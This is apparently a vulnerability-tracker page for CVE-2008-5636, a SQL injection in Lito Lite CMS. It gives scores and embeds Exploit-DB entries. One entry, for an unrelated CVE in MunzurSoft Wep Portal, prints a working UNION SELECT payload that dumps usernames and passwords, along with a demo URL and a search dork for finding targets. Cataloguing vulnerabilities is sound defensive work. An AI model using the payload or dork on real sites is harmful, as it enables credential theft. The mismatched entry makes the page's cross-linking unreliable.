CVE-2008-5636
published 2008-12-17CVE-2008-5636: SQL injection vulnerability in cate.php in Lito Lite CMS, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.12%
62.2th percentile
SQL injection vulnerability in cate.php in Lito Lite CMS, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the cid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lovedesigner | lito_lite_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Lito Lite CMS - 'cid' SQL Injection
exploitdb·2008-11-29
CVE-2008-5636 Lito Lite CMS - 'cid' SQL Injection
Lito Lite CMS - 'cid' SQL Injection
---
#!/usr/bin/perl -w
#===========================================================
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
#===========================================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : Lito Lite CMS
#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip
#########################
Exploit-DB
MunzurSoft Wep Portal W3 - 'kat' SQL Injection
exploitdb·2008-10-10
CVE-2008-4573 MunzurSoft Wep Portal W3 - 'kat' SQL Injection
MunzurSoft Wep Portal W3 - 'kat' SQL Injection
---
Author : LUPUS
Home : www.megaturks.net / www.biyosecurity.com
E-Mail : By[nokta]lupus @gmail.com
Down : http://www.aspindir.com/indir.asp?ID=5636
Dork : "MunzurSoft Wep Portal W3"
Demo : http://www.munzursoft.somee.com/www/kategori.asp?kat=2%20union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
Exploit
union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler
Greetz : ENO7 - Liz0zim - Kerem125 - Prens - SaO - The_BekiR - h4ckinger - ZeberuS
Note: Önemli Olan İnsan Olmaktır.
# milw0rm.com [2008-10-10]
No writeups or analysis indexed.
http://secunia.com/advisories/32910http://securityreason.com/securityalert/4779http://www.securityfocus.com/bid/32538http://www.vupen.com/english/advisories/2008/3300https://exchange.xforce.ibmcloud.com/vulnerabilities/46923https://www.exploit-db.com/exploits/7294http://secunia.com/advisories/32910http://securityreason.com/securityalert/4779http://www.securityfocus.com/bid/32538http://www.vupen.com/english/advisories/2008/3300https://exchange.xforce.ibmcloud.com/vulnerabilities/46923https://www.exploit-db.com/exploits/7294
2008-12-17
Published